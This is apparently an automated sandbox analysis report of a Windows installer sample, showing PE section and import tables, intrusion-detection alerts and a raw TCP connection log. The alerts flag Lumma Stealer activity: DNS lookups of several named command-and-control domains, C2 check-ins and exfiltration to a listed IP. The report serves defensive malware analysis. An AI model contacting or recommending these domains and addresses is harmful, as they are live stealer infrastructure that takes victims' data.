                                                                                                                                          .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rsrc0x1000000x3dd60x3e00dd0bef767dd402b5e43760f872ba0825False0.3206275201612903data3.2491159454321363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .reloc0x1040000xfd60x10003be994507c33de1e64a3838e10ac6bdaFalse0.597412109375data5.588401656476848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_ICON0x1001f00xb94PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003711201079622
                                                                                                                                          RT_ICON0x100d840x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.08665581773799837
                                                                                                                                          RT_ICON0x1033ec0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.22429078014184398
                                                                                                                                          RT_DIALOG0x1038540x100dataEnglishUnited States0.5234375
                                                                                                                                          RT_DIALOG0x1039540x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                          RT_DIALOG0x103a700x60dataEnglishUnited States0.7291666666666666
                                                                                                                                          RT_GROUP_ICON0x103ad00x30dataEnglishUnited States0.875
                                                                                                                                          RT_MANIFEST0x103b000x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                          DLLImport
                                                                                                                                          KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                          USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                          SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                          ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States
                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2025-01-10T12:06:21.870440+01002058612ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz)1192.168.2.4510021.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.882584+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.4648891.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.894226+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.4605201.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.905518+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.4613301.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.917168+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.4546801.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.934811+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.4644531.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.950791+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.4509191.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.962806+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.4537621.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:21.975796+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.4537651.1.1.153UDP
                                                                                                                                          2025-01-10T12:06:22.661289+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.102.49.254443TCP
                                                                                                                                          2025-01-10T12:06:23.171566+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449737104.102.49.254443TCP
                                                                                                                                          2025-01-10T12:06:23.771159+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:24.232789+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449738104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:24.232789+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:24.707840+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:25.177022+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449739104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:25.177022+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:25.928436+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:27.143705+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:28.329583+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:29.625250+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:30.613387+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:31.813411+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449744104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:32.305834+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.64.1443TCP
                                                                                                                                          2025-01-10T12:06:32.770493+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745104.21.64.1443TCP
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 10, 2025 12:06:22.002865076 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:22.002902031 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:22.003015995 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:22.006567955 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:22.006582022 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:22.661048889 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:22.661288977 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:22.666254044 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:22.666265965 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:22.666749954 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:22.712958097 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:22.715888023 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:22.759341002 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.171643972 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.171672106 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.171724081 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.171741009 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.171792984 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.171832085 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.171832085 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.171842098 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.171852112 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.171866894 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.171925068 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.261085033 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.261116028 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.261193991 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.261204004 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.261250973 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.261251926 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.266244888 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.266321898 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.270832062 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.270885944 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.270899057 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.270937920 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.270992041 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.271827936 CET49737443192.168.2.4104.102.49.254
                                                                                                                                          Jan 10, 2025 12:06:23.271850109 CET44349737104.102.49.254192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.284075975 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:23.284106016 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.284183025 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:23.284516096 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:23.284527063 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.770941973 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.771158934 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:23.773144960 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:23.773158073 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.773485899 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:23.774792910 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:23.774792910 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:23.774872065 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.232795954 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.232903957 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.233009100 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.233273983 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.233273983 CET49738443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.233297110 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.233308077 CET44349738104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.240933895 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.240988016 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.241239071 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.241877079 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.241895914 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.707765102 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.707839966 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.709415913 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.709443092 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.710064888 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:24.711407900 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.711430073 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:24.711566925 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177026987 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177087069 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177115917 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177155018 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177186012 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177205086 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177244902 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.177244902 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.177273035 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.177292109 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.181757927 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.181793928 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.181813002 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.181819916 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.181830883 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.181875944 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.181885958 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.181946993 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.265364885 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.265511036 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.265575886 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.265714884 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.265747070 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.265786886 CET49739443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.265798092 CET44349739104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.450849056 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.450891018 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.450978041 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.451575994 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.451595068 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.928354025 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.928436041 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.930336952 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.930362940 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.930663109 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.932349920 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.932712078 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.932744026 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:25.932801008 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:25.932816029 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:26.585578918 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:26.585685015 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:26.585777998 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:26.591375113 CET49740443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:26.591396093 CET44349740104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:26.687400103 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:26.687432051 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:26.687542915 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:26.688009977 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:26.688021898 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.143632889 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.143704891 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.145124912 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.145132065 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.145462990 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.146766901 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.146882057 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.146904945 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.607758045 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.607886076 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.607994080 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.608179092 CET49741443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.608192921 CET44349741104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.842983961 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.843029976 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:27.843108892 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.843508959 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:27.843521118 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.329323053 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.329582930 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:28.330821991 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:28.330840111 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.331127882 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.332590103 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:28.332847118 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:28.332882881 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.333015919 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:28.333024979 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.979715109 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.979805946 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:28.979868889 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:28.980334044 CET49742443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:28.980355978 CET44349742104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:29.161921024 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:29.161950111 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:29.162059069 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:29.163033009 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:29.163044930 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:29.625171900 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:29.625250101 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:29.627389908 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:29.627397060 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:29.627603054 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:29.628902912 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:29.629019022 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:29.629021883 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.069155931 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.069256067 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.069462061 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.071332932 CET49743443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.071343899 CET44349743104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.150538921 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.150593996 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.150796890 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.151360989 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.151376963 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.612080097 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.613387108 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.617372990 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.617386103 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.617650986 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:30.618944883 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.618944883 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:30.618964911 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:31.813221931 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:31.813293934 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:31.813349962 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:31.813570023 CET49744443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:31.813585043 CET44349744104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:31.849026918 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:31.849046946 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:31.849170923 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:31.849608898 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:31.849622011 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:32.305438042 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:32.305834055 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:32.307130098 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:32.307146072 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:32.307359934 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:32.310524940 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:32.310524940 CET49745443192.168.2.4104.21.64.1
                                                                                                                                          Jan 10, 2025 12:06:32.310585976 CET44349745104.21.64.1192.168.2.4
                                                                                                                                          Jan 10, 2025 12:06:32.770330906 CET44349745104.21.64.1192.168.2.4
